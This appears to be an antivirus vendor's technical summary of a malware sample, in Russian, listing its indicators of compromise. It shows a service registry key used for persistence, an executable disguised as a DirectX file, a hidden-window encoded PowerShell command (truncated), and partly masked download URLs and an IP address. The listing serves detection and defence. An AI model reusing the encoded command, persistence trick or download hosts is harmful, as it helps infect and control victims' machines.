Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\d3dcsx_42] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\d3dcsx_42] 'ImagePath' = '"%WINDIR%\SysWOW64\irclass\d3dcsx_42.exe"'
- 'd3dcsx_42' "%WINDIR%\SysWOW64\irclass\d3dcsx_42.exe"
- 'd3dcsx_42' %WINDIR%\SysWOW64\irclass\d3dcsx_42.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFoAQwBSAE8AeQBoAGkAPQAnAFoAQQBHAFEASABuAHYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAcgBJAFQAeQBgAFAAUgBvAGAAVABPAGMAYABvAEwAIgAgAD...
- %HOMEPATH%\583.exe
- %HOMEPATH%\583.exe
- %HOMEPATH%\583.exe в %WINDIR%\syswow64\irclass\d3dcsx_42.exe
- %HOMEPATH%\583.exe
- '76.##.179.47':80
- http://www.gr####studio.com/docs/olohz_suq_munasyr/
- http://www.gr####records.com/wp-admin/5h_jns_l3s6/
- http://gt##uth.com/drinkmenu/38vq_z8al_r5cujfy90n/
- http://76.##.179.47/KzQMndYKH/N4qVwYRYK/
- DNS ASK gr####studio.com
- DNS ASK gr####records.com
- DNS ASK gt##uth.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFoAQwBSAE8AeQBoAGkAPQAnAFoAQQBHAFEASABuAHYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAcgBJAFQAeQBgAFAAUgBvAGAAVABPAGMAYABvAEwAIgAgAD...' (со скрытым окном)